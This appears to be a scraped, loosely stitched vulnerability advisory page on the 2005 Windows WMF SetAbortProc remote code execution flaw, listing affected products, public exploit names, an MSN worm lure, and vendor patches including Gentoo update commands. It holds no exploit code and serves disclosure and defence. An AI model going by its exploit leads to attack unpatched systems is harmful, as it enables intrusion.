   <mailto:cert@cert.org?subject=TA05-362A%20Feedback%20VU%23181038>
   _________________________________________________________________

   Produced 2005 by US-CERT, a government organization.

   Terms of use

   <http://www.us-cert.gov/legal.html>

   Revision History

   December 28, 2005: Initial release
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
    

- Vulnerability Information

21987
Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution
Local / Remote Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial, Virus / Malware Vendor Verified, Uncoordinated Disclosure, Discovered in the Wild

- Vulnerability Description

A code execution flaw exists in Windows. Shimgvw.dll fails to validate WMF files resulting in code execution via the SETABORTPROC function. With a specially crafted file, a context-dependent attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-12-27 Unknown
2005-12-27 2006-01-05

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability Author

- Vulnerability Information

Microsoft Windows Graphics Rendering Engine WMF SetAbortProc Code Execution Vulnerability
Design Error 16074
Yes Yes
2005-12-28 12:00:00 2007-11-02 06:36:00
The individual responsible for discovering this issue is not currently known.

- Affected Software Versions

XnView XnView Standard 1.80.3
XnView XnView Minimal 1.80.3
XnView XnView Complete 1.80.3
Wine Windows API Emulator 0.9.4
Wine Windows API Emulator 0.9.3
Wine Windows API Emulator 0.9.2
Wine Windows API Emulator 0.9.1
Wine Windows API Emulator 0.9
Nortel Networks Symposium TAPI Service Provider
Nortel Networks Symposium Agent
Nortel Networks Passport Multiservice Data Manager (MDM)
Nortel Networks Optivity Telephony Manager (OTM)
Nortel Networks Multimedia Communication Platform
Nortel Networks MCS 5200 3.0
Nortel Networks MCS 5100 3.0
Nortel Networks IP Address Domain Manager
Nortel Networks Enterprise Network Management System
Nortel Networks Contact Center Web Client
Nortel Networks Contact Center Multimedia
Nortel Networks Contact Center Manager
Nortel Networks Contact Center Express
Nortel Networks Contact Center
Nortel Networks Communication Control Toolkit 0
Nortel Networks Centrex IP Client Manager
Nortel Networks CallPilot 4.0
Nortel Networks CallPilot 3.0
Nortel Networks CallPilot 2.0
Nortel Networks CallPilot 1.0.7
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Vista December CTP
Microsoft Windows Vista Beta 1
Microsoft Windows Vista Beta
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6a
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
IrfanView IrfanView 3.98
IrfanView IrfanView 3.97
IrfanView IrfanView 3.95
IBM Lotus Notes 6.5.4
IBM Lotus Notes 6.5.3
IBM Lotus Notes 6.5.2
IBM Lotus Notes 6.5.1
IBM Lotus Notes 6.5
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Avaya Unified Communications Center S3400
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
Avaya Modular Messaging (MAS)
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers

- Discussion

Microsoft Windows WMF graphics rendering engine is affected by a remote code-execution vulnerability. This issue affects the 'SetAbortProc' function.

The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file.

The issue may be exploited remotely or locally. Any remote code execution that occurs will be with the privileges of the user viewing a malicious image. An attacker may gain SYSTEM privileges if an administrator views the malicious file.

Local code execution may facilitate a complete compromise.

- Exploit

A remote code-execution exploit that triggers this issue is currently circulating in the wild.

An exploit (ie_xp_pfv_metafile.pm revision 1.6) has been released for the Metasploit Framework.

A new exploit (ie_xp_pfv_metafile-19.pm revision 1.9) has been released for the Metasploit Framework. Reports indicate that this exploit can bypass current antivirus and snort signatures.

UPDATE: There are reports of a worm that is exploiting this vulnerability over MSN. The worm is allegedly enticing users to download a file entitled "xmas-2006 FUNNY.jpg" through links distributed in instant messages. Symantec is currently investigating this. This BID will be updated as more information emerges.

Exploit code wmf_exp.c has been supplied by Unl0ck Research Team. Symantec has not verified the integrity of this exploit.

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution


Please see the referenced advisories for more information:

- Microsoft has released a security advisory (Microsoft Security Advisory (912840)) confirming this issue. The referenced advisory contains information about workarounds; the vendor plans to release updates in the near future.
- Microsoft has released a security advisory (Microsoft Security Bulletin MS06-001) to address this issue for supported operating systems. Reports indicate that users who have disabled Microsoft Windows Picture and Fax Viewer by deregistering 'shimgvw.dll' may have to register it manually after applying fixes released by Microsoft. Please see the Workaround section for instructions on registering 'shimgvw.dll'.
- Avaya has released advisory ASA-2006-001 to identify vulnerable Avaya products. Avaya recommends installing Microsoft fixes to address this issue on affected computers.
- Gentoo Linux has released advisory GLSA 200601-09 to address this issue in Wine. Users of affected packages should execute the following commands with superuser privileges:

emerge --sync
emerge --ask --oneshot --verbose ">=app-emulation/wine-20050930"

- Nortel Networks has released a security advisory to address this issue in various products.
- Microsoft has released patches to address this issue in Microsoft Windows Vista Beta 1 and Windows Vista December CTP (Community Technology Preview). See fixes for the Windows Vista December CTP (Community Technology Preview) patch. Users are advised to contact Microsoft for the Windows Vista Beta 1 patch.
- Gentoo has released advisory GLSA 200601-09:02 to replace fixes that were released as part of the Gentoo advisory 200601-09. The fixes released in the previous advisory did not properly address this issue. Please see the referenced advisory for more information. All Wine users should re-emerge Wine by carrying out the following commands:

emerge --sync
emerge --ask --oneshot --verbose ">=app-emulation/wine-0.9.0"

- Debian has released advisory DSA 954-1 to address this issue in Wine. Please see the referenced advisory for more information.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows Vista December CTP

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows Server 2003 Standard x64 Edition

- References
